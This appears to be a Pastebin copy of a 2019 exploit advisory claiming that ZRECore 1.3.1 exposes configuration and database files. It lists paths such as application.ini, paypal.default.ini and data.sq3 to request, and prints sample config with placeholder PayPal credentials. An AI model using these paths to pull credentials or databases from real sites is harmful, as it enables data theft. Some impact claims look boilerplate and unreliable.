Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : ZRECore 1.3.1 Database Config Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : zend.com
- # Software Download Link : github.com/zrecore/ZRECore/archive/master.zip
- # Software Information Link : npmjs.com/package/zrecore
- github.com/zrecore/ZRECore
- # Software Version : From 1.01 to 1.3.1
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- ZRECore - The most intuitive approach to e-commerce application development.
- This application provides a native Mobile and E-Commerce API to all types of PHP
- applications, including Wordpress, Drupal, Joomla, and many more.
- Built upon the Zend Framework MVC library, the ZRECore application provides a
- stable and easily modified e-commerce API you can use directly in any PHP project.
- ZRECore leverages various technologies, including Doctrine 2, Sqlite3, and jQuery
- in order to provide a powerful, yet intuitive code base that any PHP programmer
- can quickly understand and extend to suite their project needs.
- ####################################################################
- # Impact :
- ***********
- ZRECore 1.3.1 [ and other versions ] configuration file may potentially
- disclose sensitive information to remote attackers.
- The configuration file that ZRECore 1.3.1 stored in /application/configs/application.ini
- and in different folders. HTTP requests consisting of a single character will cause the software to
- disclose sensitive configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration
- file also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access config file via URL request. This may aid in further attacks.
- ####################################################################
- # Database Config Disclosure Exploit :
- ********************************
- /application/configs/application.ini
- autoloadernamespaces.passwordHash = "PasswordHash" ;
- ; Database
- resources.db.adapter = "PDO_SQLITE"
- resources.db.params.dbname = APPLICATION_PATH "/../data/sqlite/data.sq3"
- resources.EntityManager.connection.path = APPLICATION_PATH "/../data/sqlite/data.sq3"
- resources.EntityManager.modelDir = APPLICATION_PATH "/models"
- resources.EntityManager.proxyDir = APPLICATION_PATH "/proxies"
- /application/configs/paypal.default.ini
- paypal.service = "express_checkout"
- paypal.api_username = "your_username"
- paypal.api_password = "your_password"
- paypal.api_signature = "your_api_signature"
- paypal.api_version = "63.0"
- paypal.authorizing_account_email = "your_paypal_email@example.com"
- paypal.endpoint_url = "https://api-3t.paypal.com/nvp"
- paypal.expresscheckout_url = "https://www.paypal.com/webscr"
- paypal.api_username = "your_username"
- paypal.api_password = "your_password"
- paypal.api_signature = "your_api_signature"
- paypal.authorizing_account_email = "your_paypal_email@example.com"
- /data/mysql/_install.sql
- /data/mysql/queueTransaction.sql
- /data/sqlite/_install.sql
- /data/sqlite/aclPermission.sql
- /data/sqlite/aclPermission.sql
- /data/sqlite/aclRole.sql
- /data/sqlite/category.sql
- /data/sqlite/comment.sql
- /data/sqlite/coupon.sql
- /data/sqlite/currency.sql
- /data/sqlite/data.sq3
- /data/sqlite/folder.sql
- /data/sqlite/item.sql
- /data/sqlite/itemCoupon.sql
- /data/sqlite/itemProperty.sql
- /data/sqlite/merchantGateway.sql
- /data/sqlite/order.sql
- /data/sqlite/orderCoupon.sql
- /data/sqlite/orderItem.sql
- /data/sqlite/orderService.sql
- /data/sqlite/orderStatusHistory.sql
- /data/sqlite/orderSubscription.sql
- /data/sqlite/packageLevel.sql
- /data/sqlite/page.sql
- /data/sqlite/post.sql
- /data/sqlite/postComment.sql
- /data/sqlite/property.sql
- /data/sqlite/propertyType.sql
- /data/sqlite/propertyValue.sql
- /data/sqlite/service.sql
- /data/sqlite/serviceCoupon.sql
- /data/sqlite/servicePackageLevel.sql
- /data/sqlite/status.sql
- /data/sqlite/subscription.sql
- /data/sqlite/subscriptionCoupon.sql
- /data/sqlite/subscriptionPackageLevel.sql
- /data/sqlite/subscriptionService.sql
- /data/sqlite/user.sql
- /data/sqlite/userAcl.sql
- /data/sqlite/userProfile.sql
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment